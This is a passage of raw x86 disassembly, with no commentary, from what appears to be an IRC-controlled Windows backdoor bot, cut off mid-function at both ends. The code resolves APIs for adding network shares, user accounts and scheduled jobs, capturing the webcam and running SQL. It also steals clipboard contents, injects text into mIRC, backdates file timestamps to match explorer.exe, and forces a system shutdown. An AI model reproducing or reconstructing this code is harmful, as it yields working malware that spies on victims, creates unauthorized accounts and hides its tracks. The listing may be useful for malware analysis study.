cmp ds:dword_43F5E4, ebx
jz short loc_40A0C1
cmp ds:dword_43F63C, ebx
jz short loc_40A0C1
cmp ecx, ebx
jz short loc_40A0C1
cmp ds:dword_43F578, ebx
jz short loc_40A0C1
cmp ds:dword_43F570, ebx
jz short loc_40A0C1
cmp ds:dword_43F580, ebx
jz short loc_40A0C1
cmp eax, ebx
jnz short loc_40A0CB
loc_40A0C1: ; CODE XREF: sub_40981F+860�j
; sub_40981F+868�j ...
mov ds:dword_43F750, 1
loc_40A0CB: ; CODE XREF: sub_40981F+8A0�j
cmp ecx, ebx
jz short loc_40A100
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov ds:dword_43F618, eax
jnz short loc_40A100
jmp short loc_40A0FA
; ---------------------------------------------------------------------------
loc_40A0E5: ; CODE XREF: sub_40981F+7CC�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F754, eax
mov ds:dword_43F750, 1
loc_40A0FA: ; CODE XREF: sub_40981F+8C4�j
mov ds:dword_43F618, ebx
loc_40A100: ; CODE XREF: sub_40981F+8AE�j
; sub_40981F+8C2�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; sub_49BE83
mov edi, eax
cmp edi, ebx
jz short loc_40A14A
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; sub_49C076
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov ds:dword_43F5F4, eax
call esi ; sub_49C076
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov ds:dword_43F720, eax
call esi ; sub_49C076
cmp ds:dword_43F5F4, ebx
mov ds:dword_43F58C, eax
jz short loc_40A155
cmp ds:dword_43F720, ebx
jz short loc_40A155
cmp eax, ebx
jnz short loc_40A15F
jmp short loc_40A155
; ---------------------------------------------------------------------------
loc_40A14A: ; CODE XREF: sub_40981F+8EC�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F75C, eax
loc_40A155: ; CODE XREF: sub_40981F+91B�j
; sub_40981F+923�j ...
mov ds:dword_43F758, 1
loc_40A15F: ; CODE XREF: sub_40981F+927�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; sub_49BE83
mov edi, eax
cmp edi, ebx
jz loc_40A255
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; sub_49C076
push offset aNetsharedel ; "NetShareDel"
push edi
mov ds:dword_43F568, eax
call esi ; sub_49C076
push offset aNetshareenum ; "NetShareEnum"
push edi
mov ds:dword_43F540, eax
call esi ; sub_49C076
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov ds:dword_43F5B4, eax
call esi ; sub_49C076
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov ds:dword_43F5E8, eax
call esi ; sub_49C076
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov ds:dword_43F6F8, eax
call esi ; sub_49C076
push offset aNetuseradd ; "NetUserAdd"
push edi
mov ds:dword_43F5A0, eax
call esi ; sub_49C076
push offset aNetuserdel ; "NetUserDel"
push edi
mov ds:dword_43F54C, eax
call esi ; sub_49C076
push offset aNetuserenum ; "NetUserEnum"
push edi
mov ds:dword_43F53C, eax
call esi ; sub_49C076
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov ds:dword_43F5D0, eax
call esi ; sub_49C076
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov ds:dword_43F6C0, eax
call esi ; sub_49C076
cmp ds:dword_43F568, ebx
mov ds:dword_43F678, eax
jz short loc_40A260
cmp ds:dword_43F540, ebx
jz short loc_40A260
cmp ds:dword_43F5B4, ebx
jz short loc_40A260
cmp ds:dword_43F5E8, ebx
jz short loc_40A260
cmp ds:dword_43F6F8, ebx
jz short loc_40A260
cmp ds:dword_43F5A0, ebx
jz short loc_40A260
cmp ds:dword_43F54C, ebx
jz short loc_40A260
cmp ds:dword_43F53C, ebx
jz short loc_40A260
cmp ds:dword_43F5D0, ebx
jz short loc_40A260
cmp ds:dword_43F6C0, ebx
jz short loc_40A260
cmp eax, ebx
jnz short loc_40A26A
jmp short loc_40A260
; ---------------------------------------------------------------------------
loc_40A255: ; CODE XREF: sub_40981F+94B�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F764, eax
loc_40A260: ; CODE XREF: sub_40981F+9E6�j
; sub_40981F+9EE�j ...
mov ds:dword_43F760, 1
loc_40A26A: ; CODE XREF: sub_40981F+A32�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; sub_49BE83
mov edi, eax
cmp edi, ebx
jz short loc_40A29F
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; sub_49C076
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov ds:dword_43F590, eax
call esi ; sub_49C076
cmp ds:dword_43F590, ebx
mov ds:dword_43F660, eax
jz short loc_40A2AA
cmp eax, ebx
jnz short loc_40A2B4
jmp short loc_40A2AA
; ---------------------------------------------------------------------------
loc_40A29F: ; CODE XREF: sub_40981F+A56�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F76C, eax
loc_40A2AA: ; CODE XREF: sub_40981F+A78�j
; sub_40981F+A7E�j
mov ds:dword_43F768, 1
loc_40A2B4: ; CODE XREF: sub_40981F+A7C�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; sub_49BE83
mov edi, eax
cmp edi, ebx
jz short loc_40A2E9
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; sub_49C076
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov ds:dword_43F6E4, eax
call esi ; sub_49C076
cmp ds:dword_43F6E4, ebx
mov ds:dword_43F6E0, eax
jz short loc_40A2F4
cmp eax, ebx
jnz short loc_40A2FE
jmp short loc_40A2F4
; ---------------------------------------------------------------------------
loc_40A2E9: ; CODE XREF: sub_40981F+AA0�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F774, eax
loc_40A2F4: ; CODE XREF: sub_40981F+AC2�j
; sub_40981F+AC8�j
mov ds:dword_43F770, 1
loc_40A2FE: ; CODE XREF: sub_40981F+AC6�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; sub_49BE83
mov edi, eax
cmp edi, ebx
jz short loc_40A35D
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; sub_49C076
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov ds:dword_43F710, eax
call esi ; sub_49C076
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov ds:dword_43F708, eax
call esi ; sub_49C076
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov ds:dword_43F6D0, eax
call esi ; sub_49C076
cmp ds:dword_43F710, ebx
mov ds:dword_43F5A8, eax
jz short loc_40A368
cmp ds:dword_43F708, ebx
jz short loc_40A368
cmp ds:dword_43F6D0, ebx
jz short loc_40A368
cmp eax, ebx
jnz short loc_40A372
jmp short loc_40A368
; ---------------------------------------------------------------------------
loc_40A35D: ; CODE XREF: sub_40981F+AEA�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F77C, eax
loc_40A368: ; CODE XREF: sub_40981F+B26�j
; sub_40981F+B2E�j ...
mov ds:dword_43F778, 1
loc_40A372: ; CODE XREF: sub_40981F+B3A�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; sub_49BE83
mov edi, eax
cmp edi, ebx
jz short loc_40A3A7
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; sub_49C076
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov ds:dword_43F5DC, eax
call esi ; sub_49C076
cmp ds:dword_43F5DC, ebx
mov ds:dword_43F6DC, eax
jz short loc_40A3B2
cmp eax, ebx
jnz short loc_40A3BC
jmp short loc_40A3B2
; ---------------------------------------------------------------------------
loc_40A3A7: ; CODE XREF: sub_40981F+B5E�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F784, eax
loc_40A3B2: ; CODE XREF: sub_40981F+B80�j
; sub_40981F+B86�j
mov ds:dword_43F780, 1
loc_40A3BC: ; CODE XREF: sub_40981F+B84�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; sub_49BE83
mov edi, eax
cmp edi, ebx
jz short loc_40A445
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; sub_49C076
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov ds:dword_43F6A4, eax
call esi ; sub_49C076
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov ds:dword_43F6F0, eax
call esi ; sub_49C076
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov ds:dword_43F62C, eax
call esi ; sub_49C076
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov ds:dword_43F5EC, eax
call esi ; sub_49C076
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov ds:dword_43F684, eax
call esi ; sub_49C076
cmp ds:dword_43F6A4, ebx
mov ds:dword_43F5F8, eax
jz short loc_40A450
cmp ds:dword_43F6F0, ebx
jz short loc_40A450
cmp ds:dword_43F62C, ebx
jz short loc_40A450
cmp ds:dword_43F5EC, ebx
jz short loc_40A450
cmp ds:dword_43F684, ebx
jz short loc_40A450
cmp eax, ebx
jnz short loc_40A45A
jmp short loc_40A450
; ---------------------------------------------------------------------------
loc_40A445: ; CODE XREF: sub_40981F+BA8�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F78C, eax
loc_40A450: ; CODE XREF: sub_40981F+BFE�j
; sub_40981F+C06�j ...
mov ds:dword_43F788, 1
loc_40A45A: ; CODE XREF: sub_40981F+C22�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; sub_49BE83
mov edi, eax
cmp edi, ebx
jz short loc_40A48F
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; sub_49C076
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov ds:dword_43F5C0, eax
call esi ; sub_49C076
cmp ds:dword_43F5C0, ebx
mov ds:dword_43F698, eax
jz short loc_40A49A
cmp eax, ebx
jnz short loc_40A4A4
jmp short loc_40A49A
; ---------------------------------------------------------------------------
loc_40A48F: ; CODE XREF: sub_40981F+C46�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F794, eax
loc_40A49A: ; CODE XREF: sub_40981F+C68�j
; sub_40981F+C6E�j
mov ds:dword_43F790, 1
loc_40A4A4: ; CODE XREF: sub_40981F+C6C�j
push 1
pop eax
pop edi
pop esi
pop ebp
pop ebx
retn
sub_40981F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A4AC proc near ; CODE XREF: sub_40EE72+57D1�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp ds:dword_43F728, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_40A4F4
push ds:dword_43F72C
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A4F4: ; CODE XREF: sub_40A4AC+1A�j
cmp ds:dword_43F730, esi
jz short loc_40A528
push ds:dword_43F734
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A528: ; CODE XREF: sub_40A4AC+4E�j
cmp ds:dword_43F738, esi
jz short loc_40A55C
push ds:dword_43F73C
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A55C: ; CODE XREF: sub_40A4AC+82�j
cmp ds:dword_43F740, esi
jz short loc_40A590
push ds:dword_43F744
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A590: ; CODE XREF: sub_40A4AC+B6�j
cmp ds:dword_43F748, esi
jz short loc_40A5C4
push ds:dword_43F74C
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A5C4: ; CODE XREF: sub_40A4AC+EA�j
cmp ds:dword_43F750, esi
jz short loc_40A5F8
push ds:dword_43F754
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A5F8: ; CODE XREF: sub_40A4AC+11E�j
cmp ds:dword_43F758, esi
jz short loc_40A62C
push ds:dword_43F75C
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A62C: ; CODE XREF: sub_40A4AC+152�j
cmp ds:dword_43F760, esi
jz short loc_40A660
push ds:dword_43F764
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A660: ; CODE XREF: sub_40A4AC+186�j
cmp ds:dword_43F768, esi
jz short loc_40A694
push ds:dword_43F76C
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A694: ; CODE XREF: sub_40A4AC+1BA�j
cmp ds:dword_43F770, esi
jz short loc_40A6C8
push ds:dword_43F774
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A6C8: ; CODE XREF: sub_40A4AC+1EE�j
cmp ds:dword_43F778, esi
jz short loc_40A6FC
push ds:dword_43F77C
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A6FC: ; CODE XREF: sub_40A4AC+222�j
cmp ds:dword_43F780, esi
jz short loc_40A730
push ds:dword_43F784
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A730: ; CODE XREF: sub_40A4AC+256�j
cmp ds:dword_43F788, esi
jz short loc_40A764
push ds:dword_43F78C
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A764: ; CODE XREF: sub_40A4AC+28A�j
cmp ds:dword_43F790, esi
jz short loc_40A798
push ds:dword_43F794
lea eax, [ebp+var_200]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A798: ; CODE XREF: sub_40A4AC+2BE�j
lea eax, [ebp+var_200]
push offset unk_42D764
push eax
call sub_4172AE
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40A7C5
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_40A7C5: ; CODE XREF: sub_40A4AC+302�j
lea eax, [ebp+var_200]
push eax
call sub_40BF6D
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40A4AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A7D7 proc near ; CODE XREF: sub_40EE72+C5E�p
; sub_40EE72+C92�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_40A862
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_40A862
cmp [ebp+arg_8], esi
jz short loc_40A862
cmp byte ptr [eax], 0
jz short loc_40A862
push ebx
push edi
call sub_42274B
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_40A85D
push [ebp+arg_4]
push edi
call sub_417880
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40A856
sub eax, edi
push eax
push edi
push ebx
call sub_418C10
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_417AB0
push eax
push [ebp+arg_8]
push ebx
call sub_418DE0
push [ebp+arg_4]
call sub_417AB0
add eax, esi
push eax
push ebx
call sub_4179D0
push ebx
push edi
call sub_4179C0
add esp, 30h
mov esi, edi
loc_40A856: ; CODE XREF: sub_40A7D7+3C�j
push ebx
call sub_417C3B
pop ecx
loc_40A85D: ; CODE XREF: sub_40A7D7+2B�j
mov eax, esi
pop ebx
jmp short loc_40A864
; ---------------------------------------------------------------------------
loc_40A862: ; CODE XREF: sub_40A7D7+C�j
; sub_40A7D7+13�j ...
xor eax, eax
loc_40A864: ; CODE XREF: sub_40A7D7+89�j
pop edi
pop esi
pop ebp
retn
sub_40A7D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A868 proc near ; CODE XREF: sub_40ECFA+E9�p
var_7D0 = dword ptr -7D0h
var_7CC = byte ptr -7CCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push 7D0h
lea eax, [ebp+var_7D0]
push 0
push eax
call sub_417330
mov esi, [ebp+arg_0]
push esi
call sub_417AB0
add esp, 10h
push 1
pop ebx
cmp eax, ebx
jge short loc_40A89E
loc_40A899: ; DATA XREF: _2:00428424�o _2:00428468�o ...
or eax, 0FFFFFFFFh
jmp short loc_40A911
; ---------------------------------------------------------------------------
loc_40A89E: ; CODE XREF: sub_40A868+2F�j
xor ecx, ecx
mov [ebp+var_7D0], esi
test eax, eax
jle short loc_40A8C0
loc_40A8AA: ; CODE XREF: sub_40A868+56�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_40A8B7
cmp dl, 0Dh
jnz short loc_40A8BB
loc_40A8B7: ; CODE XREF: sub_40A868+48�j
and byte ptr [ecx+esi], 0
loc_40A8BB: ; CODE XREF: sub_40A868+4D�j
inc ecx
cmp ecx, eax
jl short loc_40A8AA
loc_40A8C0: ; CODE XREF: sub_40A868+40�j
xor edx, edx
push edi
test eax, eax
jle short loc_40A8F1
lea edi, [ebp+var_7CC]
loc_40A8CD: ; CODE XREF: sub_40A868+87�j
cmp byte ptr [edx+esi], 0
jnz short loc_40A8EC
cmp byte ptr [edx+esi+1], 0
lea ecx, [edx+esi+1]
jz short loc_40A8EC
cmp ebx, 1F4h
jge short loc_40A8F1
mov [edi], ecx
inc ebx
add edi, 4
loc_40A8EC: ; CODE XREF: sub_40A868+69�j
; sub_40A868+74�j
inc edx
cmp edx, eax
jl short loc_40A8CD
loc_40A8F1: ; CODE XREF: sub_40A868+5D�j
; sub_40A868+7C�j
cmp [ebp+arg_4], 0
pop edi
jz short loc_40A90F
lea eax, [ebp+var_7D0]
push 7D0h
push eax
push [ebp+arg_4]
call sub_417390
add esp, 0Ch
loc_40A90F: ; CODE XREF: sub_40A868+8E�j
mov eax, ebx
loc_40A911: ; CODE XREF: sub_40A868+34�j
pop esi
pop ebx
leave
retn
sub_40A868 endp
; =============== S U B R O U T I N E =======================================
sub_40A915 proc near ; CODE XREF: sub_40A96F+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_40A94E
push ebx
mov ebx, edi
loc_40A932: ; CODE XREF: sub_40A915+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_40A951
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_40A932
pop ebx
loc_40A94E: ; CODE XREF: sub_40A915+18�j
pop edi
pop esi
retn
sub_40A915 endp
; =============== S U B R O U T I N E =======================================
sub_40A951 proc near ; CODE XREF: sub_40A915+25�p
; sub_40A96F+6B�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_419101
cmp al, 61h
pop ecx
jl short loc_40A96C
cmp al, 7Ah
jg short loc_40A96C
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_40A96C: ; CODE XREF: sub_40A951+E�j
; sub_40A951+12�j
xor eax, eax
retn
sub_40A951 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A96F proc near ; CODE XREF: sub_40C04D+10�p
; sub_40C07F+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_417B30
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_417AB0
push [ebp+arg_4]
mov [ebp+var_4], eax
call sub_417AB0
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_40A915
add esp, 14h
dec esi
mov edi, esi
loc_40A9AD: ; CODE XREF: sub_40A96F+B6�j
test esi, esi
jle short loc_40AA2B
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_419101
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_419101
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40AA23
loc_40A9D3: ; CODE XREF: sub_40A96F+B2�j
mov ebx, [ebp+arg_0]
mov al, [edi+ebx]
push eax
call sub_40A951
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_40A9F4
mov eax, ecx
loc_40A9F4: ; CODE XREF: sub_40A96F+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_40AA27
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_419101
mov edx, eax
movsx eax, byte ptr [edi+ebx]
push eax
mov [ebp+var_8], edx
call sub_419101
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_40A9D3
loc_40AA23: ; CODE XREF: sub_40A96F+62�j
dec edi
dec esi
jmp short loc_40A9AD
; ---------------------------------------------------------------------------
loc_40AA27: ; CODE XREF: sub_40A96F+8A�j
xor eax, eax
jmp short loc_40AA30
; ---------------------------------------------------------------------------
loc_40AA2B: ; CODE XREF: sub_40A96F+40�j
mov eax, [ebp+arg_0]
add eax, edi
loc_40AA30: ; CODE XREF: sub_40A96F+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_40A96F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA35 proc near ; CODE XREF: sub_40EE72+3C8C�p
; sub_40EE72+4AF5�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_42408C ; RtlGetLastWin32Error
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_424104 ; FormatMessageA
lea eax, [ebp+var_100]
loc_40AA6E: ; CODE XREF: sub_40AA35+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_40AA7A
cmp cl, 9
jnz short loc_40AA7D
loc_40AA7A: ; CODE XREF: sub_40AA35+3E�j
inc eax
jmp short loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AA7D: ; CODE XREF: sub_40AA35+43�j
; sub_40AA35+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_40AA97
mov cl, [eax]
cmp cl, 2Eh
jz short loc_40AA7D
cmp cl, 21h
jl short loc_40AA7D
loc_40AA97: ; CODE XREF: sub_40AA35+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset dword_43F798
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_41782A
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40AA35 endp
; =============== S U B R O U T I N E =======================================
sub_40AABF proc near ; CODE XREF: sub_40EE72+5730�p
push esi
push 0
call ds:dword_43F638 ; OpenClipboard
test eax, eax
jz short loc_40AAF6
push 1
call ds:dword_43F658 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_40AAF6
push edi
push esi
call ds:dword_42410C ; GlobalLock
push esi
mov edi, eax
call ds:dword_424108 ; GlobalUnlock
call ds:dword_43F6BC ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40AAF6: ; CODE XREF: sub_40AABF+B�j
; sub_40AABF+19�j
xor eax, eax
pop esi
retn
sub_40AABF endp
; =============== S U B R O U T I N E =======================================
sub_40AAFA proc near ; CODE XREF: sub_40EE72+48BF�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
mov edi, offset aMirc ; "mIRC"
push esi
push edi
call ds:dword_43F674 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_40AB76
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:off_424114
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call ds:off_424000
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_4172AE
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call ds:dword_43F6C4 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call ds:dword_43F6C4 ; SendMessageA
push ebx
call ds:off_424110
push edi
call ds:off_424078
push 1
pop eax
pop ebx
jmp short loc_40AB78
; ---------------------------------------------------------------------------
loc_40AB76: ; CODE XREF: sub_40AAFA+16�j
xor eax, eax
loc_40AB78: ; CODE XREF: sub_40AAFA+7A�j
pop edi
pop esi
pop ebp
retn
sub_40AAFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AB7C proc near ; CODE XREF: sub_40E6A9+212�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call ds:off_43F724
test eax, eax
jz short loc_40AC1B
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, ds:off_424084
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; sub_49C2B0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40AC1B
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_42411C ; GetFileTime
push ebx
mov ebx, ds:off_424078
call ebx ; sub_49C3D5
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; sub_49C2B0
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40AC1B
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_424118 ; SetFileTime
push esi
call ebx ; sub_49C3D5
loc_40AC1B: ; CODE XREF: sub_40AB7C+2A�j
; sub_40AB7C+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40AB7C endp
; =============== S U B R O U T I N E =======================================
sub_40AC20 proc near ; CODE XREF: sub_40EE72+13C4�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_41511D
pop ecx
pop ecx
push 50005h
push 6
call ds:dword_43F5B0 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_40AC20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AC42 proc near ; CODE XREF: sub_40CAF1+472�p
; sub_40EE72+59D2�p
var_764 = byte ptr -764h
